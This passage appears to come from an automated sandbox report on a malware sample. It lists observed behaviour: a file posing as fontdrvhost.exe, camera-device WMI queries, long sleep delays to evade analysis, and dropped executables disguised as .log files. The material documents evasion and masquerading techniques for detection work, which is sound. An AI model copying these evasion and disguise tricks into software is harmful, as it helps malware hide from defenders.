                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: A50000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: 1A720000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Memory allocated: DB0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Memory allocated: 1A8D0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Memory allocated: 1170000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Memory allocated: 1AC30000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: 840000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: 1A510000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: 1440000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: 1B1F0000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: E70000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Memory allocated: 1A860000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 600000
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 599874
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 599765
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 599656
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 599546
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 599437
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 599326
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 599218
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 597062
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 596953
                                    Source: C:\Drivers\fontdrvhost.exe Thread delayed: delay time: 596840
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 599859
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 599730
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 599297
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 598969
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 598840
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 598718
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 598489
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597953
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597813
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597672
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597562
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597448
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597315
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597188
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 597078
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 596968
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 596859
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Thread delayed: delay time: 596748
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596636Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596516Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596391Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596266Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596155Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596047Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595927Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595797Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595687Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595578Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595469Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595234Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595122Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595008Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594635Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594505Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594041Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593609Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593437Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593219Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593109Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeWindow / User API: threadDelayed 4819Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWindow / User API: threadDelayed 5484Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWindow / User API: threadDelayed 4198Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\PjHeJXVW.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OwXMDaSq.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\beESemrN.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\lNXiOOwv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\UXZdmUkL.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\SvkCuJlg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\rfCzNWvT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\LtQnCbUd.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\BoUXaXGR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\crKSmbgv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\uNJXqjUH.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rFAHquBj.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\JRcNKQWy.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\rWShinUN.logJump to dropped file
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23806
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599874s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599765s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599656s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599546s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599437s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599326s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599218s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -100000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99891s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99782s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99667s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99547s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99438s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99313s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99188s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99063s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98944s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98829s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98704s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98579s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98454s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98329s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98204s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98078s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -97951s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -597062s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -596953s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -596840s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6036Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 64Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 3468Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -599859s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -599730s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -599297s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 2196Thread sleep time: -21600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598969s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598840s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598718s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598489s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597953s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597813s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597672s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597562s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597448s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597315s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597188s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597078s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596968s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596859s >= -30000sJump to behavior
